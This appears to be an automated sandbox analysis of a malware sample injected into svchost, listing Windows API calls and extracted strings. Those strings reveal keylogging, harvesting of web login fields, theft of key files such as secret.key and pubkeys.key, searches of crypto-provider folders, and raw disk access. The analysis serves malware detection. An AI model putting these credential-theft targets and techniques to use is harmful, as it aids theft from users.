                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,00000000), ref: 02C81C15
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C1C
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C81C2F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 02C81C3F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02C81C46
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,02C83142,?,?,?,00000000), ref: 02C81C66
                                                                                                                                                                                                            • HeapReAlloc.KERNEL32(00000000,?,?,00000000), ref: 02C81C6D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocValidatememset$AncestorFreeTextWindow
                                                                                                                                                                                                            • String ID: [bks]$[del]$[ins]$[ret]$[tab]
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C92337
                                                                                                                                                                                                            • PathFindFileNameA.SHLWAPI(?), ref: 02C92344
                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(General,DefaultPrivateDir,00000000,?,00000104,?), ref: 02C92394
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C923AC
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 02C923B5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02C923C5
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C921B0
                                                                                                                                                                                                              • Part of subcall function 02C92180: CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                              • Part of subcall function 02C92180: GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                              • Part of subcall function 02C92180: IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                              • Part of subcall function 02C92180: SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                              • Part of subcall function 02C92180: SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                              • Part of subcall function 02C92180: PathAddBackslashA.SHLWAPI(6D1DA6D0,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C923E6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$Backslash$CharDirectoryErrorFileLastNameUpper$AdminCreateCurrentFindFolderMakeModulePrivateProfileStringSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA6D0$DefaultPrivateDir$General$STF$interpro.ini
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C82051
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(02CCBADC,?,?,?), ref: 02C82068
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(02CCBADC,?,?,?), ref: 02C82078
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C820A5
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,A0000000,00000000), ref: 02C820C7
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000104,02C82265,00000000,00000000,75569300), ref: 02C820FB
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,02C82265), ref: 02C82112
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C82123
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateCurrentDirectoryDriveInformationTypeWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: \\.\PhysicalDrive%u
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: wsprintf$ComputerNamelstrlen
                                                                                                                                                                                                            • String ID: MSCTF.Shared.MAPPING.%x$MSCTF.Shared.MUTEX.%x
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • setsockopt.WS2_32(?,00000006,00000001,02C98817,00000004), ref: 02C9E737
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: setsockopt
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C9116E
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 02C91193
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,\clmain.exe), ref: 02C911A5
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileModuleNamememset
                                                                                                                                                                                                            • String ID: \clmain.exe
                                                                                                                                                                                                            • API String ID: 350293641-582869414
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000104,?), ref: 02C9C3F9
                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(?), ref: 02C9C43E
                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 02C9C4B2
                                                                                                                                                                                                            • free.MSVCRT ref: 02C9C4DF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Drive$ErrorLogicalModeStringsTypefree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2496910992-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F1D0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da230), ref: 02C8F1F7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F235
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8F23F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F247
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F259
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8F260
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8F29C
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8F2AA
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da230,?,?), ref: 02C8F2E5
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8F31F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8F329
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F331
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F340
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000,?), ref: 02C97017
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97037
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97048
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: GetHandleInformation.KERNEL32(?,?,00000000,00000000,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97061
                                                                                                                                                                                                              • Part of subcall function 02C96FF0: CloseHandle.KERNEL32(?,?,?,02C97C88,00000000,00000000,75495CE0,?,02C82855,00000000,00000000,00000000,00000000), ref: 02C97072
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8F347
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02C8F375
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C8F3A0
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F3EB
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104), ref: 02C8F405
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F448
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,secret.key,00000104,?,secret.key,00000002), ref: 02C8F462
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,02CB854C,00000002), ref: 02C8F487
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8F4CA
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,pubkeys.key,00000104), ref: 02C8F4E4
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002), ref: 02C8F509
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C8F540
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F543
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F550
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F553
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?), ref: 02C8F562
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 02C8F573
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8F57A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32 ref: 02C8F58E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8F5A0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002), ref: 02C8F5CD
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F5D0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8F5DD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F5E0
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002), ref: 02C8F5E9
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8F5EC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8F5FD
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8F600
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$HandleProcess$ErrorFileLastPathmemset$CloseCreateDirectoryFreeInformationSleepValidatelstrcpyn$AdminAttributesBackslashFolderMakeMutexSystemUser$CurrentDeleteReleaseUnmapView
                                                                                                                                                                                                            • String ID: 6d1da230$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Wu$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                            • API String ID: 3271848171-3992485419
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,?,?), ref: 02C7F8A1
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F8A4
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F8BE
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 02C7F8DE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F8FF
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F902
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F917
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C7F92D
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F949
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 02C7F95C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110), ref: 02C7F96C
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F96F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F98A
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 02C7F99D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 02C7F9E9
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F9EC
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7FA00
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7FA10
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7FA1E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7FA60
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA8C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FA8F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7FA9C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FA9F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAAB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FAAE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FABB
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FABE
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAD4
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FAD7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FAE4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FAE7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?), ref: 02C7FB06
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FB0F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB18
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FB1B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB27
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7FB2A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7FB33
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7FB36
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                            • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                            • API String ID: 1808236364-2343086565
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,self.cer,00000000,00000000,00000000,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA1A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA28
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000001,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CA35
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\micros~\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAA7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\maxthon3\public\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAB7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\microsoft\crypto\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAC7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\crypto pro\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAD7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\progra~1\crypto~1\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAE7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\temporary internet files\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CAF7
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,:\users\public,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB07
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,02CB81F4,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB17
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,02CB4230,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB23
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cryptokit\,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB33
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,:\progra~1\common~1\crypto~1,?,02C7107F,00000000,?,02C7149C,00000000,?), ref: 02C8CB3F
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8B260,?,00000000,00000000), ref: 02C8CB62
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateThread
                                                                                                                                                                                                            • String ID: :\progra~1\common~1\crypto~1$:\users\public$\crypto pro\$\crypto\$\cryptokit\$\maxthon3\public\$\microsoft\crypto\$\micros~\crypto\$\private\$\progra~1\crypto~1\$\public\$\temporary internet files\$crypto$self.cer
                                                                                                                                                                                                            • API String ID: 2422867632-4225811205
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000002,7556F570,?,?), ref: 02C87AA3
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C87AAA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C87ABE
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,?), ref: 02C87ADB
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 02C87AEC
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87AFD
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87B10
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C87B3D
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA0AA), ref: 02C87B4B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA), ref: 02C87B56
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87BB8
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87BCB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C87BFD
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA718), ref: 02C87C0B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C87C16
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C90BE0,00000000,00000000,00000000), ref: 02C87C71
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87C90
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C87CA3
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C87CCF
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,6D1DA6D0), ref: 02C87CDD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C87CE8
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C92320,00000000,00000000,00000000), ref: 02C87D43
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C87D5B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C87D6C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D7B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C87D7E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C87D8B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C87D8E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
                                                                                                                                                                                                            • String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$6D1DA0AA$6D1DA6D0$6D1DA718$login=$name_$pass.log$pass_$password=
                                                                                                                                                                                                            • API String ID: 3712039096-1217459975
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E3F8
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB8D0,00000000), ref: 02C8E439
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E43F
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E447
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB8D0), ref: 02C8E456
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E45D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02CCB8D0,00000000), ref: 02C8E499
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02CCB8D0), ref: 02C8E4A4
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208,?,?), ref: 02C8E4E6
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E521
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E527
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E52F
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E53E
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C8E545
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E573
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C8E579
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8E581
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E590
